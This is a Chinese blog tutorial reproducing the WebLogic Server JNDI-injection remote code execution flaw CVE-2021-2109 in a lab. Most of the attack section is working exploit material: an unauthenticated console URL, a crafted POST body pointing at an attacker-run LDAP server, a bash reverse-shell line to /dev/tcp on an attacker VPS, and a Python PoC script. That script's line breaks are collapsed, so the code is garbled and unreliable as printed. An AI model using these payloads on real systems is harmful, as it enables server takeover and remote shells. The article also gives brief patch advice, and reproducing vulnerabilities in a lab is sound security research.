Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现

2023-11-28 00:59

本文主要是介绍Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一. 漏洞描述

二. 影响版本

三. 测试环境搭建

四. 漏洞复现

1. 远程命令执行

2. 反弹shell

五. 漏洞修复

六. 漏洞检测POC


一. 漏洞描述

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
       该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。

二. 影响版本

  • Weblogic Server 10.3.6.0.0
  • Weblogic Server 12.1.3.0.0
  • Weblogic Server 12.2.1.3.0
  • Weblogic Server 12.2.1.4.0
  • Weblogic Server 14.1.1.0.0

 

三. 测试环境搭建

使用Vulhub的CVE-2020-14882(weblogic:12.2.1.3版本)漏洞环境来复现,如下启动漏洞环境。

docker-compose up -d

访问:7001/console,如下说明环境搭建成功

四. 漏洞复现

1. 远程命令执行

1.1 下载LDAP工具,地址:https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

注:运行ldap需要java1.8环境,执行java -version查看jdk版本

我把工具放在了阿里云的vps上,开启监听

java -jar JNDIExploit-v1.11.jar -i vps的ip

注意:如果是用的vps的话,安全组一定要放行1389和8080端口端口,我一开始一直没复现成功,后面才发现是没有放行端口,以至于vps接收不到数据

1.2 访问  /console/css/%252e%252e%252f/consolejndi.portal   (CVE-2020-14882存在未授权访问漏洞)

截取数据包发送到重放模块,将请求发送换为post

1.3 将get改为post,并在请求头中添加cmd:id ,中并构造以下数据包。其中xx.xx.xx;xx 为vps的ip,注意第三个是为;分号不是.点

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/Basic/WeblogicEcho;AdminServer%22)

 发送数据后,vps开启的监听就会有反应

执行了命令

 

2. 反弹shell

1. 将上面请求头中cmd字段的值改为反弹shell的语句

bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1 

进行编码,网址:http://www.jackson-t.ca/runtime-exec-payloads.html

2. nc开启监听

3. 发送数据

 

五. 漏洞修复

1、建议用户及时将 Weblogic 后台/console/console.portal 对外的访问权限暂时关闭。
2、此次 Oracle 官方的 CPU已发布了针对该漏洞的补丁,请受影响用户及时下载补丁程序并安装更新。

3、由于是通过JNDI注入进行远程命令执行,所以受到JDK版本的影响,建议升级Weblogic Server运行环境的JDK版本

六. 漏洞检测POC

usage: python poc.py 目标地址  vps地址

#author:xcc
import requests
import os
import argparse
def url():parser = argparse.ArgumentParser(description='(CVE-2021-2109)Weblogic Server远程代码执行漏洞POC')parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:7001')parser.add_argument('vps',type=str,help="The vps ip address of listening,example: xx.xx.xx.xx")args = parser.parse_args() global urlglobal vpsurl = args.target_urlvps = args.vps#检测输入的url的正确性if url.startswith('http://') or url.startswith('https://'):passelse:print('[-]Please include http:// or https:// in the URL!!')os._exit(0)if url.endswith('/'):url = url[:-1]print('[+]author:chenchen')print("[-](CVE-2021-2109 )Weblogic Server远程代码执行漏洞POC",)print("[-]正在执行检测...")print("[-]目标地址:",url)print("[-]vps地址:",vps)return urlreturn vps
def poc(url):headers={'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'}url = url + '/console/css/%252e%252e%252f/consolejndi.portal'try:code = requests.get(headers=headers,url=url,timeout=10).status_codeif code == 200:passelse:print('[-]不存在漏洞')os._exit(0)except:print("[-]发生错误")c= vps.rsplit('.',1)vps_1 = c[0]+';'+c[1]headers={'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2','Accept-Encoding': 'gzip, deflate','Connection': 'close','cmd': 'id','Upgrade-Insecure-Requests': '1','Content-Type': 'application/x-www-form-urlencoded','Content-Length': '175'}data= f'_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://{vps_1}:1389/Basic/WeblogicEcho;AdminServer%22)'try:response = requests.post(url=url,headers=headers,data=data,timeout=8).textif "uid" in response and "gid" in response:print("[+]存在(CVE-2021-2109 )Weblogic Server远程代码执行漏洞")else:print("[-]漏洞不存在")except:print('[-]发生错误!')
if __name__ == '__main__':url()poc(url)

——心,若没有栖息的地方,到哪都是流浪

 

这篇关于Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/428784

相关文章

SQL server数据库如何下载和安装

《SQLserver数据库如何下载和安装》本文指导如何下载安装SQLServer2022评估版及SSMS工具,涵盖安装配置、连接字符串设置、C#连接数据库方法和安全注意事项,如混合验证、参数化查... 目录第一步:打开官网下载对应文件第二步:程序安装配置第三部:安装工具SQL Server Manageme

C#连接SQL server数据库命令的基本步骤

《C#连接SQLserver数据库命令的基本步骤》文章讲解了连接SQLServer数据库的步骤,包括引入命名空间、构建连接字符串、使用SqlConnection和SqlCommand执行SQL操作,... 目录建议配合使用:如何下载和安装SQL server数据库-CSDN博客1. 引入必要的命名空间2.

SQL Server配置管理器无法打开的四种解决方法

《SQLServer配置管理器无法打开的四种解决方法》本文总结了SQLServer配置管理器无法打开的四种解决方法,文中通过图文示例介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的... 目录方法一:桌面图标进入方法二:运行窗口进入检查版本号对照表php方法三:查找文件路径方法四:检查 S

一文详解Git中分支本地和远程删除的方法

《一文详解Git中分支本地和远程删除的方法》在使用Git进行版本控制的过程中,我们会创建多个分支来进行不同功能的开发,这就容易涉及到如何正确地删除本地分支和远程分支,下面我们就来看看相关的实现方法吧... 目录技术背景实现步骤删除本地分支删除远程www.chinasem.cn分支同步删除信息到其他机器示例步骤

SQL Server修改数据库名及物理数据文件名操作步骤

《SQLServer修改数据库名及物理数据文件名操作步骤》在SQLServer中重命名数据库是一个常见的操作,但需要确保用户具有足够的权限来执行此操作,:本文主要介绍SQLServer修改数据... 目录一、背景介绍二、操作步骤2.1 设置为单用户模式(断开连接)2.2 修改数据库名称2.3 查找逻辑文件名

SQL Server数据库死锁处理超详细攻略

《SQLServer数据库死锁处理超详细攻略》SQLServer作为主流数据库管理系统,在高并发场景下可能面临死锁问题,影响系统性能和稳定性,这篇文章主要给大家介绍了关于SQLServer数据库死... 目录一、引言二、查询 Sqlserver 中造成死锁的 SPID三、用内置函数查询执行信息1. sp_w

Python远程控制MySQL的完整指南

《Python远程控制MySQL的完整指南》MySQL是最流行的关系型数据库之一,Python通过多种方式可以与MySQL进行交互,下面小编就为大家详细介绍一下Python操作MySQL的常用方法和最... 目录1. 准备工作2. 连接mysql数据库使用mysql-connector使用PyMySQL3.

Linux中修改Apache HTTP Server(httpd)默认端口的完整指南

《Linux中修改ApacheHTTPServer(httpd)默认端口的完整指南》ApacheHTTPServer(简称httpd)是Linux系统中最常用的Web服务器之一,本文将详细介绍如何... 目录一、修改 httpd 默认端口的步骤1. 查找 httpd 配置文件路径2. 编辑配置文件3. 保存

Linux使用scp进行远程目录文件复制的详细步骤和示例

《Linux使用scp进行远程目录文件复制的详细步骤和示例》在Linux系统中,scp(安全复制协议)是一个使用SSH(安全外壳协议)进行文件和目录安全传输的命令,它允许在远程主机之间复制文件和目录,... 目录1. 什么是scp?2. 语法3. 示例示例 1: 复制本地目录到远程主机示例 2: 复制远程主

IDEA如何实现远程断点调试jar包

《IDEA如何实现远程断点调试jar包》:本文主要介绍IDEA如何实现远程断点调试jar包的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录问题步骤总结问题以jar包的形式运行Spring Boot项目时报错,但是在IDEA开发环境javascript下编译